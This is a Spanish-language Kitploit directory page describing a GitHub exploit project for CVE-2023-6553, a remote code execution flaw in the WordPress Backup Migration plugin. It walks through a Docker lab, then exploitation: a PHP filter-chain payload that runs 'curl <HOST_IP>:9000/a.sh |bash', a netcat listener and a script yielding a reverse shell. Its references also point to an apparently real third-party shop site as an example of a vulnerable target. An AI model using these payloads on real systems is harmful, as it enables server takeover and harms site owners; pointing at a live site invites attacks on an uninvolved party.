Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-6553 — Desarrollo de exploits para CVE-2023-6553 en el plugin de Backup de Wordpress | Kitploit
Herramientas/GitHubGitHub/harshit-mashru/cve-2023-6553
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

Desarrollo de exploits para CVE-2023-6553 en el plugin de Backup de Wordpress

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-6553

Desarrollo de exploit para CVE-2023-6553 en el plugin Backup en Wordpress

Esto es una CVE crítica con una puntuación CVSS de 9.8

La vulnerabilidad permite al atacante enviar comandos al servidor que ejecuta la versión vulnerable del plugin

Versión vulnerable Backup <= 1.3.7

Configuración

  1. Clona el repositorio

  2. Ejecuta el siguiente comando para levantar los contenedores Docker

root@kitploit:~
docker-compose up -d

Deberías ver 2 contenedores Docker

  • Wordpress
  • SQL
  1. Ahora puedes navegar al sitio de Wordpress en la IP del contenedor Docker, y también se puede acceder en
root@kitploit:~
http://localhost:8000/
  1. Para instalar el plugin de backup vulnerable, ejecuta el siguiente comando
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. Ahora inicia sesión en el sitio web de Wordpress usando el enlace del paso 3 e instala el plugin de backup después de descargarlo con el comando anterior

Explotación

  1. Inicia un listener en el puerto 9000 para recibir las llamadas cuando ejecutemos el exploit.
root@kitploit:~
python3 -m http.server
  1. Ejecuta el script de Go usando el siguiente comando
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. Obtendrás el siguiente error
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

Esto se debe a que después de las conversiones del filtro, el tamaño de la cabecera supera el límite permitido por el servidor.

  1. Así que ahora dividimos nuestro comando en fragmentos, lo escribimos en un archivo en el servidor remoto y luego lo ejecutamos, pero antes de eso tenemos que ponernos en escucha para obtener una reverse shell
root@kitploit:~
nc -nlvp 8080

y ahora ejecuta el comando para explotar el plugin vulnerable

root@kitploit:~
python3 final_exploit.py
  1. Deberías tener una reverse shell en este punto

Referencias

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • Lo fácil que es comprobar si una versión vulnerable de Wordpress está presente: https://www.thetraveloutlier.com/shop/​
Descargar herramienta